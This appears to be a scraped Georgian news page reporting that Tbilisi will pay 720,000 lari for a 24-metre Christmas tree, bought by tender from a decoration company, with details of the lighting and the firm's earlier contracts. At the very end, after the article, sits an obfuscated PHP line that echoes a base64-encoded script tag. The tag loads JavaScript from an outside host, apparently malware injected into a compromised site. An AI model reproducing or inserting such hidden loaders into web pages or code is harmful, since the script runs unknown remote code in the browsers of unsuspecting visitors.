celsiusi
ავერსი საქკაბელი

სახელმწიფო შესყიდვების ეროვნული სააგენტოს ვებგვერდზე გამოქვეყნებული ინფორმაციი მიხედვით თბილისს ახალი ნაძვისხის შეძენა 720 ათასი ლარი დაუჯდება. ცნობილია, რომ ტენდერში კომპანია ღამის შოუს სტუდიამ გაიმარჯვა, რომელთანაც ხელშეკრულების მომზადების პროცესი მიმდინარეობს. გამოქვეყნებული განაცხადის მიხედვით, კომპანია თბილისის მერიას ნაძვის ხეს 720 ათას ლარად მიაწვდის, რაც სატენდერო ფასზე 10 ათასი ლარით ნაკლებია.

სატენდერო განაცხადის მიხედვით, ირკვევა,  რომ ნაძვის ხის სიმაღლე უნდა იყოს 24 მეტრი. მას 365 ტოტი და 120 ცალი ფარდა განათება უნდა ჰქონდეს. ნაძვის ხე 100 აქსესუარით მოირთვება. მათ შორის იქნება გრძივად აწყობილი ბურთები, კონტურული ვარსკვლავები და ფიფქები, კონტურული მოგრძო ფორმის სათამაშოები.

განაცხადს თან ახლავს შესრულებული გამოცდილების დამადასტურებელი დოკუმენტაციაც, რომლის თანახმადაც კომპანიამ ადგილობრივ მუნიციპალიტეტებსა და კერძო კომპანიებს ნაძვის ხის მორთვისა და საახალწლო დეკორაციების მიწოდების 10 კონტრაქტი აქვს შესრულებული, რომელთა საერთო ღირებულებაც 874 ათას ლარს შეადგენს.

333
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");